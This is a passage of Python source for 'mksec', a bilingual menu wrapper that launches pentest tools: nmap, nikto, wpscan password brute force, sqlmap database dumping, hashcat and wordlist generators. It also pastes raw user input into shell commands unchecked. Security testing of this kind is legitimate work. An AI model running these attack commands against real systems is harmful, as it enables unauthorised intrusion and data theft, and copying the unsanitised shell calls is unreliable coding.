port = port.replace("set port ","").replace("set PORT ","").replace("SET port ","").replace("SET PORT ","").center(25)
elif "set special" in uinput.lower():
special = uinput
special = special.replace("set special ","").replace("set SPECIAL ","").replace("SET special ","").replace("SET SPECIAL ","").center(25)
elif "run" == uinput.lower():
os.system("sudo nmap " + special.strip() + " " + ip.strip() + " " + port.strip())
def nikto():
ip = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[nikto]\033[37m\x1b[0m ")
UserInputs(uinput+"vuln")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mScans the target system for vulnerabilities.\n\x1b[33mTR:\x1b[37mHedef sistemde zafiyet taraması yapar.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIP {} YES Target ip address \x1b[32mex: 192.168.10.8 or test.com\x1b[37m".format(ip))
elif "set ip" in uinput.lower():
ip = uinput
ip = ip.replace("set ip ","").replace("set IP ","").replace("SET ip ","").replace("SET IP ","").center(25)
elif "run" == uinput.lower():
os.system("sudo nikto -h " + ip.strip())
def unixPrivescCheck():
check = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[unix-privesc-check]\033[37m\x1b[0m ")
UserInputs(uinput+"vuln")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mIt is a tool used to find possible vulnerabilities of the system before escalation in Linux systems. If it doesn't work with the \x1b[36m'run'\x1b[37m command, try the \x1b[36m'run -f'\x1b[37m command.\n\x1b[33mTR:\x1b[37mLinux sistemlerde yetki yükseltme işleminden önce, sistemin olası açıklarını bulmak için kullanılan bir araçtır. \x1b[36m'run'\x1b[37m komutu ile çalışmıyorsa \x1b[36m'run -f'\x1b[37m komutunu deneyiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nCHECK {} YES Scan format: \x1b[32m(standard/detailed)\x1b[37m".format(check))
elif "set check" in uinput.lower():
check = uinput
check = check.replace("set check ","").replace("set CHECK ","").replace("SET check ","").replace("SET CHECK ","").center(25)
elif "run" == uinput.lower():
os.system("unix-privesc-check " + check.strip())
elif "run -f" == uinput.lower():
os.system("cd /opt/unix-privesc-check/ && bash upc.sh " + check.strip())
def chkrootkit():
check = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[chkrootkit]\033[37m\x1b[0m ")
UserInputs(uinput+"vuln")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mChkrootkit tool analyzes rootkit viruses on the whole system.\nRootkit is a specially crafted malicious software.\nRootkits, like viruses, infiltrate and control the system to damage the system. \n\n\x1b[33mInterpreting Chkrootkit output:\x1b[37m\n\n\x1b[31mNot found:\x1b[37m No virus found.\n\x1b[31mNot infected:\x1b[37m No virus infected.\n\x1b[31mNothing found:\x1b[37m Nothing found.\n\x1b[31mNothing deleted:\x1b[37m Nothing has been deleted.\n\x1b[31mNo suspect files:\x1b[37m Suspicious file not found.\n\x1b[31mInfected:\x1b[37m The virus is infected.\n\n\x1b[33mTR:\x1b[37mChkrootkit aracı, bütün sistemde rootkit virüslerinin analizini yapar.\nRootkit, özel olarak hazırlanmış zararlı bir yazılımdır.\nRootkitler, virüsler gibi sisteme zarar vermek için sisteme sızıp kontrol etmektir.\n\n\x1b[33mChkrootkit çıktısının yorumlanması:\x1b[37m\n\n\x1b[31mNot found:\x1b[37m Virüs bulunamadı.\n\x1b[31mNot infected:\x1b[37m Virüs bulaşmadı.\n\x1b[31mNothing found:\x1b[37m Hiçbir sey bulunamadı.\n\x1b[31mNothing deleted:\x1b[37m Hiçbir sey silinmemiş.\n\x1b[31mNo suspect files:\x1b[37m Şüpheli dosya bulunamadı.\n\x1b[31mInfected:\x1b[37m Virüs bulaştı.\n")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nCHECK {} NO ---".format(check))
elif "set check" in uinput.lower():
check = uinput
check = check.replace("set check ","").replace("set CHECK ","").replace("SET check ","").replace("SET CHECK ","").center(25)
elif "run" == uinput.lower():
os.system("sudo chkrootkit")
def lynis():
check = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[lynis]\033[37m\x1b[0m ")
UserInputs(uinput+"vuln")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mLynis is a system integrity scan program for Linux and Unix based systems. It checks that the services that make the system work are integrated and error-free. \n\x1b[33mTR:\x1b[37mLynis, Linux ve Unix temelli sistemler için bir sistem bütünlük tarama programıdır. Sistemin çalışmasını sağlayan servislerin entegre ve hatasız çalıştığını kontrol eder.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nCHECK {} NO ---".format(check))
elif "set check" in uinput.lower():
check = uinput
check = check.replace("set check ","").replace("set CHECK ","").replace("SET check ","").replace("SET CHECK ","").center(25)
elif "run" == uinput.lower():
os.system("sudo lynis audit system")
def skipfish():
url = " "
output = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[skipfish]\033[37m\x1b[0m ")
UserInputs(uinput+"webapp")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mSearches the website for vulnerabilities.\n\x1b[33mTR:\x1b[37mWeb sitesinde zafiyet arar.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nURL {} YES Target Site \x1b[32mex: http://testphp.vulnweb.com\x1b[37m\nOUTPUT{} YES Where you want to save? \x1b[32mex: /root/Desktop/test\x1b[37m".format(url,output))
elif "set url" in uinput.lower():
url = uinput
url = url.replace("set url ","").replace("set URL ","").replace("SET url ","").replace("SET URL ","").center(25)
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif "run" == uinput.lower():
os.system("skipfish -o " + output.strip() + " " + url.strip())
def wpscan():
url = " "
output = " "
attacks = " "
usernamelist = " "
passwordlist = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[wpscan]\033[37m\x1b[0m ")
UserInputs(uinput+"webapp")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mWPScan can be used in various areas such as finding and brute-force plugins and themes used on a WordPress site.\n\x1b[33mTR:\x1b[37mWPScan, bir WordPress sitesinde kullanılan eklentileri ve temaları bulmak ve brute force yapmak gibi çeşitli alanlarda kullanılabilir.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nURL {} YES Target Site \x1b[32mex: hackware.ru\x1b[37m\nOUTPUT {} YES Where you want to save? \x1b[32mex: /root/Desktop/test\x1b[37m\nUSERNAME{} NO Only used for brute force attack \x1b[32mex: /root/Desktop/username-list.txt\x1b[37m\nPASSWORD{} NO Only used for brute force attack \x1b[32mex: /root/Desktop/password-list.txt\x1b[37m\nATTACK {} OPT To see attack types: \x1b[32m--attacks\x1b[37m".format(url,output,usernamelist,passwordlist,attacks))
elif "--attacks" == uinput.lower():
print("\x1b[1m\x1b[37m\nLeave blank for \x1b[33mQuick scan\x1b[37m\nType \x1b[36m'-e vp'\x1b[37m for \x1b[33mVulnerable Plugins\x1b[37m\nType \x1b[36m'-e ap'\x1b[37m for \x1b[33mAll Plugins\x1b[37m\nType \x1b[36m'-e p'\x1b[37m for \x1b[33mPopular Plugins\x1b[37m\nType \x1b[36m'-e vt'\x1b[37m for \x1b[33mVulnerable Themes\x1b[37m\nType \x1b[36m'-e at'\x1b[37m for \x1b[33mAll Themes\x1b[37m\nType \x1b[36m'-e t'\x1b[37m for \x1b[33mPopuler Themes\x1b[37m\nType \x1b[36m'-e tt'\x1b[37m for \x1b[33mTimthumbs\x1b[37m\nType \x1b[36m'-e cb'\x1b[37m for \x1b[33mConfig Backups\x1b[37m\nType \x1b[36m'-e dbe'\x1b[37m for \x1b[33mDB Exports\x1b[37m\nType \x1b[36m'-e u\x1b[37m' for \x1b[33mUser ID's\x1b[37m\nType \x1b[36m'-e m'\x1b[37m for \x1b[33mMedia ID's\x1b[37m\nFill in all options for \x1b[33mBrute Force\x1b[37m and run it by typing \x1b[36m'brute force'\x1b[37m\x1b[32m\n")
elif "set url" in uinput.lower():
url = uinput
url = url.replace("set url ","").replace("set URL ","").replace("SET url ","").replace("SET URL ","").center(25)
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif "set username" in uinput.lower():
usernamelist = uinput
usernamelist = usernamelist.replace("set username ","").replace("set USERNAME ","").replace("SET username ","").replace("SET USERNAME ","").center(25)
elif "set password" in uinput.lower():
passwordlist = uinput
passwordlist = passwordlist.replace("set password ","").replace("set PASSWORD ","").replace("SET password ","").replace("SET PASSWORD ","").center(25)
elif "set attack" in uinput.lower():
attacks = uinput
attacks = attacks.replace("set attack ","").replace("set ATTACK ","").replace("SET attack ","").replace("SET ATTACK ","").center(25)
elif "run" == uinput.lower():
print("please wait...")
os.system("wpscan --url " + url.strip() + " -o " + output.strip() + " " + attacks.strip() + " --random-user-agent")
elif "brute" == uinput.lower():
print("please wait...")
os.system("sudo wpscan --url " + url.strip() + " -o " + output.strip() + " -U " + usernamelist.strip() + " -P " + passwordlist.strip() + " --random-user-agent ")
def sqlmap():
url = " "
database = " "
tables = " "
columns = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[sqlmap]\033[37m\x1b[0m ")
UserInputs(uinput+"webapp")
if uinput.lower() == "info":
print("\x1b[1m\x1b[37m\x1b[33mWhat is Sqlmap?\x1b[37m\n\x1b[33m===============\x1b[37m\nSqlmap is an open source sql injection vulnerability detection and exploitation tool.\nIt detects the type of sql injection on the system by sending various queries/commands to the database system used by the target web application provided to it.\n\n\x1b[33mHere are some data that can be obtained about the target with sqlmap:\x1b[37m\n\x1b[33m=====================================================================\x1b[37m\nDatabase type and version (–banner, –all)\nCurrent used database and all database names that can be accessed (–current-db, –dbs)\nDatabase tables (tables) and their columns (columns) (–tables, –columns)\nDatabase data(–dump, –dump-all)\nDatabase current user and all users(–current-user, –users)\nDatabase user password (–passwords)\nInformation whether the database user is DB admin (–is-dba)\nInformation about the target server (Operating system, technology in which the application is used, etc., -f)\n\n\x1b[33mHow is it used in \x1b[36mMKSEC\x1b[37m?\n====================================\n\x1b[32m[1]\x1b[37m If you are only going to enter 'URL' and you want to test the exposed site, type \x1b[36m'run --url'\x1b[37m or \x1b[36m'run -u'\x1b[37m.\n\x1b[32m[2]\x1b[37m If you have accessed the database on the vulnerable site and filled in the 'URL' and 'DB' sections, type \x1b[36m'run --url --database'\x1b[37m or \x1b[36m'run -u -d'\x1b[37m.\n\x1b[32m[3]\x1b[37m If you have filled in 'URL', 'DB', 'TABLES' in the vulnerable site, type \x1b[36m'run --url --database --tables'\x1b[37m or \x1b[36m'run -u -d -t'\x1b[37m.\n\x1b[32m[4]\x1b[37m If you have filled in 'URL', 'DB', 'TABLES', 'COLUMNS' on the vulnerable site, type \x1b[36m'run --url --database --tables --columns'\x1b[37m or \x1b[36m'run -u -d -t -c'\x1b[37m.\n\n\n\x1b[33mSqlmap Nedir?\x1b[37m\n\x1b[33m=============\x1b[37m\nSqlmap açık kaynak kodlu sql injection açıklığı tespit ve istismar etme aracıdır.\nKendisine sağlanan hedef web uygulamasının kullandığı veritabanı sistemine gönderdiği çeşitli sorgular/komutlar ile sistem üzerindeki sql injection tipini tespit eder.\n\n\x1b[33mSqlmap ile hedef hakkında elde edilebilen bazı veriler;\x1b[37m\n\x1b[33m=======================================================\x1b[37m\nVeritabanı türü ve versiyonu (–banner,–all)\nMevcut kullanılan veritabanı ve erişilebilen tüm veritabanı isimleri (–current-db, –dbs)\nVeritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns)\nVeritabanı datası(–dump, –dump-all)\nVeritabanı mevcut kullanıcısı ve tüm kullanıcılar(–current-user,–users)\nVeritabanı kullanıcı parolası (–passwords)\nVeritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba)\nHedef sunucu hakkında bilgi(İşletim sistemi, Uygulamanın kullanıldığı teknoloji vs. , -f)\n\n\x1b[36mMKSEC\x1b[33m içerisinde nasıl kullanılır?\x1b[37m\n\x1b[33m==================================\x1b[37m\n\x1b[32m[1]\x1b[37m Sadece 'URL' girecekseniz ve açıklı siteyi test etmek istiyorsanız \x1b[36m'run --url'\x1b[37m or \x1b[36m'run -u'\x1b[37m yazınız.\n\x1b[32m[2]\x1b[37m Zaafiyetli sitedeki veritabanına eriştiyseniz ve 'URL' ve 'DB' kısımlarını doldurduysanız \x1b[36m'run --url --database'\x1b[37m or \x1b[36m'run -u -d'\x1b[37m yazınız.\n\x1b[32m[3]\x1b[37m Zaafiyetli sitede 'URL', 'DB', 'TABLES' kısımlarını doldurduysanız \x1b[36m'run --url --database --tables'\x1b[37m or \x1b[36m'run -u -d -t'\x1b[37m yazınız.\n\x1b[32m[4]\x1b[37m Zaafiyetli sitede 'URL', 'DB', 'TABLES', 'COLUMNS' kısımlarını doldurduysanız \x1b[36m'run --url --database --tables --columns'\x1b[37m or \x1b[36m'run -u -d -t -c'\x1b[37m yazınız.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nURL {} YES Target Site \x1b[32mex: http://www.test.com/article.php?id=108\x1b[37m\nDB {} OPT Database name of target site \x1b[32mex: Information_Schema\x1b[37m\nTABLES {} OPT Tables of the target site \x1b[32mex: Administrators\x1b[37m\nCOLUMNS{} OPT Columns of the target site \x1b[32mex: Columns\x1b[37m".format(url,database,tables,columns))
elif "set url" in uinput.lower():
url = uinput
url = url.replace("set url ","").replace("set URL ","").replace("SET url ","").replace("SET URL ","").center(50)
elif "set db" in uinput.lower():
database = uinput
database = database.replace("set db ","").replace("set DB ","").replace("SET db ","").replace("SET DB ","").center(50)
elif "set tables" in uinput.lower():
tables = uinput
tables = tables.replace("set tables ","").replace("set TABLES ","").replace("SET tables ","").replace("SET TABLES ","").center(50)
elif "set columns" in uinput.lower():
columns = uinput
columns = columns.replace("set columns ","").replace("set COLUMNS ","").replace("SET columns ","").replace("SET COLUMNS ","").center(50)
elif "run" == uinput.lower():
print("\x1b[1m\x1b[31mCommand not found. You can check the run command by typing 'info'\x1b[1m")
elif "run --url" == uinput.lower() or "run -u" == uinput.lower():
print("\x1b[1m\x1b[36m[*]MKSEC")
os.system("sqlmap -u " + url.strip() + " --dbs --random-agent")
elif "run --url --database" == uinput.lower() or "run -u -d" == uinput.lower():
print("\x1b[1m\x1b[36m[*]MKSEC")
os.system("sqlmap -u " + url.strip() + " -D " + database.strip() + " --tables --random-agent")
elif "run --url --database --tables" == uinput.lower() or "run -u -d -t" == uinput.lower():
print("\x1b[1m\x1b[36m[*]MKSEC")
os.system("sqlmap -u " + url.strip() + " -D " + database.strip() + " -T " + tables.strip() + " -- columns --random-agent")
elif "run --url --database --tables --columns" == uinput.lower() or "run -u -d -t -c" == uinput.lower():
print("\x1b[1m\x1b[36m[*]MKSEC")
os.system("sqlmap -u " + url.strip() + " -D " + database.strip() + " -T " + tables.strip() + " -C " + columns.strip() + " --dump --random-agent")
else:
os.system("clear")
sqlmap()
def cewl():
url = " "
mail = " "
output = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[cewl]\033[37m\x1b[0m ")
UserInputs(uinput+"pass")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mCollects the words that can be a password on any site and prepares a wordlist using these words. Can also collect e-mail addresses from the site.\n\x1b[33mTR:\x1b[37mHerhangi bir sitede şifre olabilecek kelimeleri toplar ve bu kelimeleri kullanarak bir kelime listesi hazırlar. Ayrıca siteden e-posta adreslerini de toplayabilir. ")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nURL {} YES Target Site \x1b[32mex: test.com\x1b[37m \nOUTPUT{} YES Where you want to save? \x1b[32mex: /root/Desktop/test.txt\x1b[37m\nMAIL {} OPT If you want to find the e-mail addresses on the target website, type \x1b[32m'-e'\x1b[37m".format(url,output,mail))
elif "set url" in uinput.lower():
url = uinput
url = url.replace("set url ","").replace("set URL ","").replace("SET url ","").replace("SET URL ","").center(25)
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif "set mail" in uinput.lower():
mail = uinput
mail = mail.replace("set mail ","").replace("set MAIL ","").replace("SET mail ","").replace("SET MAIL ","").center(25)
elif "run" == uinput.lower():
os.system("sudo cewl " + url.strip() + " -w " + output.strip() + " " + mail.strip())
def crunch():
min = " "
max = " "
char = " "
output = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[crunch]\033[37m\x1b[0m ")
UserInputs(uinput+"pass")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mIt is a tool that allows you to create a wordlist with the specified length and characters from previously determined character sets or created by you.\n\x1b[33mTR:\x1b[37mDaha önce belirlediğiniz veya sizin oluşturduğunuz karakter kümelerinden belirtilen uzunluk ve karakterlerle wordlist oluşturmanıza olanak sağlayan bir araçtır.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nMIN {} YES The words in the word list you will create should consist of at least how many letters \x1b[32mex: 8\x1b[37m\nMAX {} YES How many letters should the words in the word list you create consist of? \x1b[32mex: 16\x1b[37m\nCHAR {} YES Identify the letters in the word list you will create \x1b[32mex: xyzABC123_-*\x1b[37m\nOUTPUT {} YES Output \x1b[32mex: /root/Desktop/mksec\x1b[37m".format(min,max,char,output))
elif "set min" in uinput.lower():
min = uinput
min = min.replace("set min ","").replace("set MIN ","").replace("SET min ","").replace("SET MIN ","").center(25)
elif "set max" in uinput.lower():
max = uinput
max = max.replace("set max ","").replace("set MAX ","").replace("SET max ","").replace("SET MAX ","").center(25)
elif "set char" in uinput.lower():
char = uinput
char = char.replace("set char ","").replace("set CHAR ","").replace("SET char ","").replace("SET CHAR ","").center(25)
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif "run" == uinput.lower():
os.system("sudo crunch " + min.strip() + " " + max.strip() + " " + char.strip() + " -o " + output.strip())
print("Process Completed")
def hashcat():
hash = " "
hashmode = " "
wordlist = " "
bruteforce = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[hashcat]\033[37m\x1b[0m ")
UserInputs(uinput+"pass")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mBreaks one-way encryption algorithms (hashes).\nUsage:\nIn order to crack the hash, you can try only one of the wordlist or brute force methods at once.\nIf you want to try with wordlist, you should fill in \x1b[34m'WORDLIST'\x1b[37m and type \x1b[34m'run -w'\x1b[37m.\nIf you want to try with brute force, you should fill in \x1b[34m'BRUTEFORCE'\x1b[37m and type \x1b[34m'run -b'\x1b[37m.\n\x1b[1m\x1b[33mTR:\x1b[37mTek yönlü şifreleme algoritmalarını (hashes) kırar.\nKullanımı:\nHash'i kırmak için aynı anda wordlist veya brute force yöntemlerinden sadece birini deneyebilirsiniz.\nKelime listesi (Wordlist) ile denemek istiyorsanız, \x1b[34m'WORDLIST'\x1b[37m alanını doldurmalı ve \x1b[34m'run -w'\x1b[37m yazmalısınız.\nKaba kuvvetle (Brute-Force) denemek istiyorsanız, \x1b[34m'BRUTEFORCE'\x1b[37m alanını doldurmalı ve \x1b[34m'run -b'\x1b[37m yazmalısınız.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nMODE {} YES You can see the hash modes by typing \x1b[32m'--hash mode'\x1b[37m. MD5 = 0 \x1b[32mex: 0\x1b[37m\nHASH {} YES Enter the hash file \x1b[32mex: /root/Desktop/hash.txt\x1b[37m\nWORDLIST {} OPT Enter the word list \x1b[32mex: /root/Desktop/wordlist.txt\x1b[37m\nBRUTEFORCE{} OPT If you are going to brute force attack, type \x1b[32m'--brute force'\x1b[37m to see its usage".format(hashmode,hash,wordlist,bruteforce))
elif "set mode" in uinput.lower():
hashmode = uinput
hashmode = hashmode.replace("set mode ","").replace("set MODE ","").replace("SET mode ","").replace("SET MODE ","").center(25)
elif "set hash" in uinput.lower():
hash = uinput
hash = hash.replace("set hash ","").replace("set HASH ","").replace("SET hash ","").replace("SET HASH ","").center(25)
elif "set wordlist" in uinput.lower():
wordlist = uinput
wordlist = wordlist.replace("set wordlist ","").replace("set WORDLIST ","").replace("SET wordlist ","").replace("SET WORDLIST ","").center(25)
elif "set bruteforce" in uinput.lower():
bruteforce = uinput
bruteforce = bruteforce.replace("set bruteforce ","").replace("set BRUTEFORCE ","").replace("SET bruteforce ","").replace("SET BRUTEFORCE ","").center(25)
elif "--hash mode" == uinput.lower():
print("- [ Hash modes ] -\n\n # | Name | Category\n==========+==================================================+=====================================\n 900 | MD4 | Raw Hash\n 0 | MD5 | Raw Hash\n 100 | SHA1 | Raw Hash\n 1300 | SHA2-224 | Raw Hash\n 1400 | SHA2-256 | Raw Hash\n 10800 | SHA2-384 | Raw Hash\n 1700 | SHA2-512 | Raw Hash\n 17300 | SHA3-224 | Raw Hash\n 17400 | SHA3-256 | Raw Hash\n 17500 | SHA3-384 | Raw Hash\n 17600 | SHA3-512 | Raw Hash\n 6000 | RIPEMD-160 | Raw Hash\n 600 | BLAKE2b-512 | Raw Hash\n 11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian | Raw Hash\n 11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian | Raw Hash\n 6900 | GOST R 34.11-94 | Raw Hash\n 5100 | Half MD5 | Raw Hash\n 18700 | Java Object hashCode() | Raw Hash\n 17700 | Keccak-224 | Raw Hash\n 17800 | Keccak-256 | Raw Hash\n 17900 | Keccak-384 | Raw Hash\n 18000 | Keccak-512 | Raw Hash\n 21400 | sha256(sha256_bin($pass)) | Raw Hash\n 6100 | Whirlpool | Raw Hash\n 10100 | SipHash | Raw Hash\n 21000 | BitShares v0.x - sha512(sha512_bin(pass)) | Raw Hash\n 10 | md5($pass.$salt) | Raw Hash, Salted and/or Iterated\n 20 | md5($salt.$pass) | Raw Hash, Salted and/or Iterated\n 3800 | md5($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated\n 3710 | md5($salt.md5($pass)) | Raw Hash, Salted and/or Iterated\n 4110 | md5($salt.md5($pass.$salt)) | Raw Hash, Salted and/or Iterated\n 4010 | md5($salt.md5($salt.$pass)) | Raw Hash, Salted and/or Iterated\n 21300 | md5($salt.sha1($salt.$pass)) | Raw Hash, Salted and/or Iterated\n 40 | md5($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated\n 2600 | md5(md5($pass)) | Raw Hash, Salted and/or Iterated\n 3910 | md5(md5($pass).md5($salt)) | Raw Hash, Salted and/or Iterated\n 4400 | md5(sha1($pass)) | Raw Hash, Salted and/or Iterated\n 20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash, Salted and/or Iterated\n 21200 | md5(sha1($salt).md5($pass)) | Raw Hash, Salted and/or Iterated\n 4300 | md5(strtoupper(md5($pass))) | Raw Hash, Salted and/or Iterated\n 30 | md5(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated\n 110 | sha1($pass.$salt) | Raw Hash, Salted and/or Iterated\n 120 | sha1($salt.$pass) | Raw Hash, Salted and/or Iterated\n 4900 | sha1($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated\n 4520 | sha1($salt.sha1($pass)) | Raw Hash, Salted and/or Iterated\n 140 | sha1($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated\n 19300 | sha1($salt1.$pass.$salt2) | Raw Hash, Salted and/or Iterated\n 14400 | sha1(CX) | Raw Hash, Salted and/or Iterated\n 4700 | sha1(md5($pass)) | Raw Hash, Salted and/or Iterated\n 4710 | sha1(md5($pass).$salt) | Raw Hash, Salted and/or Iterated\n 21100 | sha1(md5($pass.$salt)) | Raw Hash, Salted and/or Iterated\n 18500 | sha1(md5(md5($pass))) | Raw Hash, Salted and/or Iterated\n 4500 | sha1(sha1($pass)) | Raw Hash, Salted and/or Iterated\n 130 | sha1(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated\n 1410 | sha256($pass.$salt) | Raw Hash, Salted and/or Iterated\n 1420 | sha256($salt.$pass) | Raw Hash, Salted and/or Iterated\n 22300 | sha256($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated\n 1440 | sha256($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated\n 20800 | sha256(md5($pass)) | Raw Hash, Salted and/or Iterated\n 20710 | sha256(sha256($pass).$salt) | Raw Hash, Salted and/or Iterated\n 1430 | sha256(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated\n 1710 | sha512($pass.$salt) | Raw Hash, Salted and/or Iterated\n 1720 | sha512($salt.$pass) | Raw Hash, Salted and/or Iterated\n 1740 | sha512($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated\n 1730 | sha512(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated\n 19500 | Ruby on Rails Restful-Authentication | Raw Hash, Salted and/or Iterated\n 50 | HMAC-MD5 (key = $pass) | Raw Hash, Authenticated\n 60 | HMAC-MD5 (key = $salt) | Raw Hash, Authenticated\n 150 | HMAC-SHA1 (key = $pass) | Raw Hash, Authenticated\n 160 | HMAC-SHA1 (key = $salt) | Raw Hash, Authenticated\n 1450 | HMAC-SHA256 (key = $pass) | Raw Hash, Authenticated\n 1460 | HMAC-SHA256 (key = $salt) | Raw Hash, Authenticated\n 1750 | HMAC-SHA512 (key = $pass) | Raw Hash, Authenticated\n 1760 | HMAC-SHA512 (key = $salt) | Raw Hash, Authenticated\n 11750 | HMAC-Streebog-256 (key = $pass), big-endian | Raw Hash, Authenticated\n 11760 | HMAC-Streebog-256 (key = $salt), big-endian | Raw Hash, Authenticated\n 11850 | HMAC-Streebog-512 (key = $pass), big-endian | Raw Hash, Authenticated\n 11860 | HMAC-Streebog-512 (key = $salt), big-endian | Raw Hash, Authenticated\n 11500 | CRC32 | Raw Checksum\n 14100 | 3DES (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack\n 14000 | DES (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack\n 15400 | ChaCha20 | Raw Cipher, Known-Plaintext attack\n 14900 | Skip32 (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack\n 11900 | PBKDF2-HMAC-MD5 | Generic KDF\n 12000 | PBKDF2-HMAC-SHA1 | Generic KDF\n 10900 | PBKDF2-HMAC-SHA256 | Generic KDF\n 12100 | PBKDF2-HMAC-SHA512 | Generic KDF\n 8900 | scrypt | Generic KDF\n 400 | phpass | Generic KDF\n 16900 | Ansible Vault | Generic KDF\n 12001 | Atlassian (PBKDF2-HMAC-SHA1) | Generic KDF\n 20200 | Python passlib pbkdf2-sha512 | Generic KDF\n 20300 | Python passlib pbkdf2-sha256 | Generic KDF\n 20400 | Python passlib pbkdf2-sha1 | Generic KDF\n 16100 | TACACS+ | Network Protocols\n 11400 | SIP digest authentication (MD5) | Network Protocols\n 5300 | IKE-PSK MD5 | Network Protocols\n 5400 | IKE-PSK SHA1 | Network Protocols\n 23200 | XMPP SCRAM 